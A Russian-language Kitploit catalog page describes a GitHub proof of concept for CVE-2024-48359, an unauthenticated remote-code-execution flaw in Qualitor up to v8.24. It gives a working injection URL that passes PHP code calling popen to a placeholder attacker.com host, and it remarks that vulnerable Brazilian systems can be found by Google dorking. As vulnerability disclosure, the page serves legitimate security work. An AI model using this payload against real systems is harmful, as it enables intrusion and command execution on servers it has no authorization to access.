Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2024-48359 — CVE-2024-48359 PoC | Kitploit
Инструменты/GitHubGitHub/openxp-research/cve-2024-48359
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеRed Teaming
GitHubopenxp-research/cve-2024-48359

CVE-2024-48359

CVE-2024-48359 PoC

Репозиторий
1121 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2024-48359 - Qualitor <= v8.24 Неаутентифицированный RCE PoC

CVE-2024-48359 | Qualitor <= v8.24 RCE

Описание

Qualitor — это платформа для управления бизнес-процессами, и эта система присутствует в различных компаниях в Бразилии, которые можно легко найти с помощью Google dorking.

Наша команда выявила уязвимость в приложении, подверженную удалённому выполнению кода (RCE), которая позволяет удалённо выполнять системные команды.

Это обход исправления для CVE-2023-47253.

Proof of Concept (POC)

Просто отправьте PHP-код в страницу processVariavel.php, напр.: /html/ad/adpesquisasql/request/processVariavel.php?gridValoresPopHidden=nl2br(stream_get_contents(popen('ping attacker.com', 'r')));

image

Исследователи

https://www.linkedin.com/in/xvinicius/

https://www.linkedin.com/in/hairrison-wenning-4631a4124/

  • OpenXP Research Team
Скачать инструмент